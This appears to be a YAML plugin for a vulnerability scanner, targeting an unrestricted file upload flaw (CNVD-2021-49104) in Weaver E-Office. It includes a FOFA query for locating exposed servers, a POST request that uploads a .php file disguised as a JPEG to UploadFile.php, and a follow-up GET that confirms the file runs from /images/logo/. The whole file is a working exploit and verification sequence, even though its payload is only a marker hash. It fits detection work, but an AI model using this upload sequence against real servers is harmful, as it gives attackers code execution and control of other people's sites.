product: 泛微E-Office
vName: 泛微E-Office uploadfile.php文件上传
type: 文件上传
vID:
  - CNVD-2021-49104
level: 3
vDesc: 在/general/index/UploadFile.php中上传文件过滤不严格导致允许无限制地上传文件，攻击者可以通过该漏洞直接获取网站权限
version: ''
note: ''
search:
  FOFA: app="泛微-EOffice"
protocol: http
link: https://www.cnblogs.com/pursue-security/p/17677400.html
fix: [ ]
model: ''
logic: and
exploit:
  - exp:
      method: post
      follow: false
      path: /general/index/UploadFile.php?m=uploadPicture&uploadType=eoffice_logo&userId=
      file:
        Filedata:
          - 52e039302a62d077.php
          - 95cc64dd2825f9df13ec4ad683ecf339
          - image/jpeg
    verify:
      path: ''
      logic: and
      check:
        - status: 200
          header:
            value:
              - text/html
            logic: and
          body:
            value:
              - logo-eoffice.php
            logic: 'and'
  - exp:
      method: get
      follow: false
      path: /images/logo/logo-eoffice.php
    verify:
      path: ''
      logic: and
      check:
        - status: 200
          body:
            value:
              - 95cc64dd2825f9df13ec4ad683ecf339
            logic: 'and'